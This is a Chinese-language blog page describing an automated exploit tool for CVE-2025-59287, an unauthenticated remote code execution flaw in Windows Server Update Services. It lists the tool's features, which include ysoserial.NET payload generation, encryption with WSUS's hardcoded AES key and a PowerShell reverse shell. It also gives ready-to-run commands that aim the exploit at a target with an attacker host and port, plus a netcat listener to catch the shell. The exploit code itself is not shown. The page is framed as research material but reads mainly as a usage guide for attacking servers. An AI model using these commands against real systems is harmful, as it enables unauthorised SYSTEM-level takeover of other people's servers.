CVE-2025-59287 WSUS远程代码执行漏洞利用详解

本文详细介绍了CVE-2025-59287 WSUS未授权远程代码执行漏洞的自动化利用工具,包含漏洞详情、功能特性、环境要求和完整的使用方法,帮助安全研究人员理解该高危漏洞的利用过程。

CVE-2025-59287 WSUS RCE漏洞利用

针对Windows Server Update Services (WSUS) 未授权远程代码执行漏洞的自动化利用工具。

漏洞详情

  • CVE ID: CVE-2025-59287
  • CVSS 评分: 9.8 (严重)
  • 攻击向量: 网络
  • 认证: 无需认证
  • 影响: 以SYSTEM权限执行远程代码

功能特性

✅ 完全自动化负载生成
✅ 自动下载ysoserial.NET依赖
✅ 内置反向shell监听器
✅ 跨平台支持 (Windows/Linux/Mac)
✅ 使用WSUS硬编码密钥的AES加密
✅ PowerShell反向shell负载

环境要求

pip install -r requirements.txt

Python依赖

.NET运行时 (自动检测)

  • Windows: .NET Framework (内置)
  • Linux/Mac: Wine 或 Mono

Ubuntu/Debian

sudo apt install wine-stable

sudo apt install mono-complete

安装步骤

克隆或下载漏洞利用文件 cd CVE-2025-59287-exploit

安装Python依赖 pip3 install -r requirements.txt

运行漏洞利用 (自动下载ysoserial.NET) python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444

使用方法

基本利用

python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

如需在其他监听器上获取会话

终端1: 启动netcat监听器 nc -lvnp 4444

终端2: 运行无内置监听器的漏洞利用

python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 –no-listener

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计